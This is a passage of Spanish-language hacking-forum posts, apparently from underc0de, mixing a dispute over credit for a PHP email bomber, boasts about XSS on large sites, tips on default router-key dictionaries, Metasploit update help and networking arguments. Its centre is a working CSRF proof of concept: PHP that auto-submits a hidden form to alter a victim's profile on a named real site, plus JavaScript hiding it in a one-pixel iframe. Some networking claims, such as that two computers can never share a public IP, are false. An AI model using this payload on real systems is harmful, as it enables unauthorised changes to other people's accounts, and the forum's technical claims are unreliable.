No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pasa lo que quieras bro, que quieres que el mundo se entere que me ayudaste a entender csrf? que me diste el codigo pedorro de un email bomber en php que utilice para armar uno mio porq no entendia como se utilizaba la funcion mail()? crees q tengo algo q esconder? mis logros son mios y mis esfuerzos son mios, yo te agradeci en el momento y q se entere todo underc0de, a mi no me hace mas verga ser un pendejo de 17 que se cree chuck norris, bien tu por tus conocimientos, pero no aportas nada mas q criticas

No me creo nada y no vengo a criticar vengo a dar mi opinión, y en este caso hice una critica en general hacia las webs más visitadas, ya que no deberian tener estos fallos tan comunes.

Que para algo está el foro para expresarse chico!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sin ser de ninguno de los bandos de la pelea solo dejo caer que el dia que programes como HDBreaker te haré una mamada

Yo no sé como programa, no visito apenas este foro, directamente apenas entro ya a foros.

Tampoco me considero un buen programador, solo afirmo que HDBreaker cuando lo conoci por un wargame que hice, y hable con el por messenger, me cayo bien, es más hicimos algunas trastadas juntos.

Yo le explique algo de PHP, y le di un ejemplo de un Email Bomber, a las semanas entre al foro y me vi el Email Bomber que le pase, pero que ponia que lo había creado el.

Entonces hay deje de hablarle.

Simple y llanamente, aunque bueno la gente cambia quien sabe 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que grande bro! Tu no testeas web pequeñas, siempre a lo grande..
Saludos,, Cronos.-

Las webs "más visitadas" si buscas un poco, alucinarias.(Si vieras mi correo..)

En cambio hay algunas apenas vistas, que su seguridad es perfecta.

Con todo respeto, creo q tu solo vienes aquí a caretear de tus habilidades, estamos felicitando a pr0ph3t por su descubrimiento no a vos por los miles que haces, si no estas de acuerdo con esto porq comentas?

No hace falta la felicitación está claro que es todo un  logro encontrar un xss.

No estoy de acuerdo con que¿? Yo no carateo mis habilidades,simplemente me mofeo de las 'grandes webs' que son las que más seguridad deberian tener en cambio, la mayoria suelen ser bastante penosas en respeto a seguridad, cuando mas grande mas visitas, cuando mas visitas, mas ojos ven, cuando mas ojos, mas fallos se dan a la luz.

Y con todos mis respetos, aprende a poner creditos a las cosas que programas, que como pase los logs tuyos hablandome por msn..(Ripeas hasta email bombers..)

Venga un saludo 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que grande bro! Tu no testeas web pequeñas, siempre a lo grande..
Saludos,, Cronos.-

Las webs "más visitadas" si buscas un poco, alucinarias.(Si vieras mi correo..)

En cambio hay algunas apenas vistas, que su seguridad es perfecta.

Usar linux.

La cosa no va de cookies, la cosa va de números, aunque ni eso.. no se si estoy dando pistas pero vamos, no sé para que pones la IP completa en el código de fuente, si da lo mismo usar esa que no, tampoco lo de la  secuencia.



Si quieres te explico por privado, porque esto es bien sencillo , no se ni porque hay pistas..

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo lo he intentando... pero soy un paquete con xss, leere mas y seguiremos probando!

Pues con nuestro amigo Live Http headers, y poco más, está echo en un segundo xD.

Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url = "ciudadhabbo.com";
$form["id"] = 26; //ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>

JS camuflando el csrf.

// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
	document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Que viejo estoy, que día llegare a ver el post el día que lo públiquen xD


No he cubierto la ip,ya sabemos por que xD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
wow me sorprende tu conocimiento

respeto.

Jajajaajaajajajajaa que Kapo.

Bueno despues de que me sigan en Twitter, me dio por mirar la web, dado que son 'informáticos' o así lo dice los titulos de su carrera.

Conclusión, acabe cabreado al observar que personas con carreras en la rama informática, dispongas de fallos tan comunes en sus sitios web.

Path vulnerable:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------------
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Screenshot:


Estado: Explotable.
Reportado: Si(Sin respuesta todavía por parte de los administradores)
Fecha del hallazgo: 9-3-2013.
Autor: Matabarras.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo necesitaría un diccionario para las WLAN_XX y WLAN_XXXX pero que sean las claves por defecto de routers y no de palabras.

Sabeis de diccionarios que sólo incluyan esos caracteres ?


Saludos

Si tienes un movil con android, esta en la play store el 'wifipass' que tiene todas las claves por defecto de las WLAN_XX y las Jazztel__XX y creeme, funciona.
La mayoria de veces, a no sea que hayan cambiado la clave por defecto del router.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gracias a los 2 por vuestra ayuda, lo he desinstalado y vuelto a instalar, tambien lo he clonado con (git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta /opt/metasploit/msf4), pero sigo sin poder actualizarlo. ¿alguna idea?. Me sale esto:

       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1042 exploits - 640 auxiliary - 176 post
+ -- --=[ 265 payloads - 28 encoders - 8 nops

msf > msfupdate

• exec: msfupdate
  
  
• 
  
• Attempting to update the Metasploit Framework...
  
• 
  
  [-] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (note, Metasploit Community
  [-] Edition is totally free and takes just a few seconds
  [-] to register!)
  [-] ERROR: Failed to update Metasploit installation
  
  [-] In order to update your Metasploit installation,
  [-] you must first register it through the UI, here:
  msf >
  
  
  
  un Saludo
  

Segun dice en ingles, que tienes que registrar tu 'interfaz de usuario'

Situate en la carpeta donde esta el Metasploit en mi caso seria así.

matabarras@matabarras ~ $ cd /opt/metasploit-4.3.0
matabarras@matabarras /opt/metasploit-4.3.0 $ sudo ./uninstall

Sigues los pasos y ya.

Si eres tan amable de especificar que Sistema operativo estás usando, te podria ayudar.

Un cordial saludo.

Como siempre linux, fuckeando a windows.

Tipico, grácias Sandra. 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No es por nada, pero en mi casa tengo dos ordenadores conectados al mismo router, y los dos tienen diferente ip pública, quizas porque sea dinamica.
En todo caso, tendriais razon si fuera estatica. 

eso es por que la conecion que haces es de bridge y no esta haciendo ruteo tu modem
eso es una configuracion especial de tu iso
pero no es nada comun ni segura
es como cuando vmware con acceso directo a la red tendran diferentes ips
en la lan es diferente a ie sea nat
como sea es un caso muy unico
no es algo ke un isp deva tener

Es algo comun hijo mio, y telefonica y ono como isp.
Lo tienen así.

No es por nada, pero en mi casa tengo dos ordenadores conectados al mismo router, y los dos tienen diferente ip pública, quizas porque sea dinamica.
En todo caso, tendriais razon si fuera estatica. 

Esta claro que la mac es unica.

Pero cuando estás scaneando una ip pública, estás scaneando la de ese ordenador y no la de todos.

Yo perfectamente puedo tener 2 ordenadores en mi casa, y en el router tener abierto un puerto como 6666, y en uno de los ordenadores tenerlo cerrado y en el otro abierto.

Y las ips públicas igual que las privadas, siempre son diferentes, siempre cambia algun digito final.
Nunca 2 ordenadores van a tener la misma dirección pública.

Pero bueno cada cual que piense sobre lo que quiera. 

Cuando estás scaneando una ip pública en concreto, estás scaneando esa computadora y los puertos que dispone.(Me explico, aunque el router los tenga abiertos, las 'compotuduras' obviamente estaran configuradas con algun firewall, para que ese puerto no se disponga abierto en ese ordenador en concreto.)

Una cosa diferente seria que scanearas un rango de ips, sobre esa ip.

Varias compotudras jamas pueden tener la misma ip pública, siempre cambia algun digito.

Y de lo demás, no entiendo que quieres decir, si puedes especificar un poco más, gracias.

Un cordial saludo
Matabarras.